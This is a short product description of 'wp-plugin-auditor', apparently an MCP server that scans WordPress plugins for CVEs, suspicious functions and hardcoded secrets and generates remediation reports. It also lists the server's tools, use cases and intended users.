wp-plugin-auditor
Scans WordPress plugins for vulnerabilities, malicious code, and security risks using MCP protocol. Generates detailed reports with risk assessments and fix recommendations. WordPress developers, site administrators, and security teams use it to vet plugins before deployment on production sites.
Overview
The wp-plugin-auditor MCP server enables programmatic auditing of WordPress plugins. It examines plugin files, metadata, and dependencies against vulnerability databases, static code analysis rules, and WordPress security standards to identify threats like backdoors, XSS flaws, and outdated libraries.
Key Capabilities
- scan_plugin: Analyzes a plugin ZIP or directory for known CVEs, suspicious functions (e.g., eval(), remote file inclusion), and hardcoded secrets.
- vulnerability_check: Queries plugin against CVE databases and WP-specific advisories, returning severity scores.
- report_generate: Compiles findings into JSON or HTML reports with remediation guidance.
- dependency_audit: Verifies third-party libraries in plugins for vulnerabilities.
These functions integrate into CI/CD pipelines or custom scripts for automated checks.
Use Cases
- Pre-deployment scanning: Developers run scan_plugin on new plugins during build processes to block risky installs.
- Site hardening: Administrators audit active plugins site-wide using vulnerability_check to prioritize updates.
- Agency workflows: Teams batch-audit client plugins with report_generate for compliance reports.
- Hosting provider monitoring: Automated dependency_audit on tenant uploads to enforce security policies.
Who This Is For
WordPress developers integrating security into devops, site owners maintaining plugin inventories, security auditors reviewing WP ecosystems, and hosting platforms enforcing plugin standards. Requires basic MCP client setup for API access.